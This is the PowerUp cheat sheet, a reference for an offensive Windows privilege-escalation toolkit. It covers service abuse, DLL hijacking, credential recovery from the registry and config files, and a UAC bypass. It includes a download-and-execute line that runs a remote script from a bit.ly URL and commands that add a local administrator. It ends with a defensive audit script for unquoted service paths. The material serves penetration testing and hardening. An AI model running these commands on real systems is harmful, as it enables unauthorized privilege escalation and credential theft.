PowerUp Cheat Sheet

Getting Started

Note: PowerUp's 'bleeding edge' will always be in the development branch of PowerSploit.
Get PowerUp: http://bit.ly/1PdjSHk
Load from disk: 1) C:\> powershell -exec bypass  2) PS C:\> Import-Module PowerUp.ps1
Load from GitHub: PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")
Load in Cobalt Strike's Beacon: beacon> powershell-import /local/path/to/PowerUp.ps1, then beacon> powershell Invoke-AllChecks
Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] [-full]
Most PowerUp functions are implemented in Empire in privesc/powerup/*

Invoke-PrivescAudit (old Invoke-AllChecks) will run all current privilege escalation checks detailed in this guide and will output the appropriate abuse function syntax for anything found. The -HTMLReport flag will write out an HTML version of the report to SYSTEM.username.html.

Enumerating Service Vulnerabilities

Get-ModifiableService: Enumerates all services where the current user can modify the service binPath.
Get-ModifiableServiceFile: Enumerates all services where the current user can write to the associated service binary or its arguments.
Get-ServiceUnquoted: Enumerates all services with unquoted binary paths.

Weaponizing Service Vulnerabilities

Invoke-ServiceAbuse abuses a vulnerable service's binPath to execute commands as SYSTEM.
Install-ServiceBinary installs a malicious C# binary for a specified service.
Both cmdlets accept the following parameters (as well as accepting a service name or service object from Get-Service on the pipeline):
-Name SERVICE: Service name to abuse.
-UserName '[DOMAIN\]USER': The username to add (defaults to 'john'). Domain users are not created, only added to the LocalGroup.
-Password: The password for the added user (defaults to 'P@55Word' and 'Password123!').
-LocalGroup "NAME": The group to add the user to (default: 'Administrators').
-Command "net...": Custom command to execute.
Install-ServiceBinary backs up the original service path to \orig_path.exe.bak. Restore-ServiceBinary will restore this backup binary to its original path.
Set-ServiceBinPath can set a service's binPath without calling sc.exe.

DLL Hijacking Helpers

Find-PathDLLHijack checks if the current %PATH% has any directories that are writeable by the current user. Weaponizable for Windows 7 with Write-HijackDll and 'FOLDER\PATH\wlbsctrl.dll'.
Write-HijackDll writes out a self-deleting .bat file to \hijackpath\debug.bat that executes a command, and writes out a hijackable DLL that launches the .bat. It accepts the same -UserName/-Password/-Command arguments as Invoke-ServiceAbuse as well as:
-DllPath PATH\wlbsctrl.dll: Path to write the hijack DLL.
-Architecture [x64/x86]: Manual arch specification.
-BatPath PATH\y.bat: Path of the .bat for the hijackable .dll to run.

Registry Checks

Get-RegistryAlwaysInstallElevated: Checks if the "AlwaysInstallElevated" key is set. This means that MSI installation packages always run as SYSTEM.
Get-RegistryAutoLogon: Returns any autologon credentials from various registry locations.
Get-ModifiableRegistryAutoRun: Returns autoruns where the current user can modify the binary/script (or its config).

Miscellaneous Checks

Get-UnattendedInstallFile: Checks for leftover unattend.xml files.
Get-Webconfig: Recovers cleartext and encrypted connection strings from all web.configs. Credit to Scott Sutherland.
Get-ProcessTokenPrivilege: Returns all privileges for the current (or specified) process.
Get-SiteListPassword: Searches for any McAfee SiteList.xml files and decrypts the contents.
Enable-Privilege: Enables a specific privilege for the current process. Available privileges can be found with Get-ProcessTokenPrivilege.
Get-CurrentUserTokenGroupSid: Returns all SIDs that the current user is a part of, even if the SID is disabled.
Invoke-EventVwrBypass: Bypasses UAC by performing an image hijack on the .msc file extension.

More Information

http://www.harmj0y.net/blog/
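The unquoted service path condition that Get-ServiceUnquoted reports is worth understanding from the remediation side: when a binPath such as C:\Program Files\Foo Bar\svc.exe is stored without quotes, the service control manager tries C:\Program.exe and C:\Program Files\Foo.exe before the real binary, so each of those parent directories needs a tight ACL. The following read-only audit is an added example written for this cheat sheet, not code from PowerUp or PowerSploit; it uses only built-in cmdlets, lists the intermediate paths an ACL review should cover, and prints the sc.exe command that quotes the path. The function name Get-UnquotedServicePathAudit is an assumption of this example.

```powershell
# Added example, not part of PowerUp: read-only audit of unquoted service
# binary paths (the condition Get-ServiceUnquoted flags) with a suggested fix.
# Run from an elevated prompt so every service is visible.
function Get-UnquotedServicePathAudit {
    [CmdletBinding()]
    param()

    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { return }

        # A path that is already quoted is not affected.
        if ($path.StartsWith('"')) { return }

        # Separate the executable from its arguments: everything up to ".exe".
        $exeIndex = $path.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
        if ($exeIndex -lt 0) { return }
        $exePath = $path.Substring(0, $exeIndex + 4)
        $argPart = $path.Substring($exeIndex + 4)

        # Only paths containing spaces are ambiguous to CreateProcess.
        if ($exePath -notmatch ' ') { return }

        # Candidate paths Windows tries in order before the real binary,
        # e.g. C:\Program.exe, then C:\Program Files\Foo.exe, ...
        $parts = $exePath.Split(' ')
        $candidates = for ($i = 1; $i -lt $parts.Length; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }

        [PSCustomObject]@{
            ServiceName    = $_.Name
            StartMode      = $_.StartMode
            RunAs          = $_.StartName
            BinaryPath     = $exePath
            CandidatePaths = $candidates
            # Remediation: rewrite the path with embedded quotes. Note the
            # mandatory space after "binPath=" in sc.exe syntax.
            Remediation    = "sc.exe config `"$($_.Name)`" binPath= `"\`"$exePath\`"$argPart`""
        }
    }
}

Get-UnquotedServicePathAudit | Format-List
```

Reviewing the ACLs of the directories that contain each CandidatePath (or simply applying the Remediation line) removes the condition; the audit itself changes nothing on the host.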
Version 1.2. Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.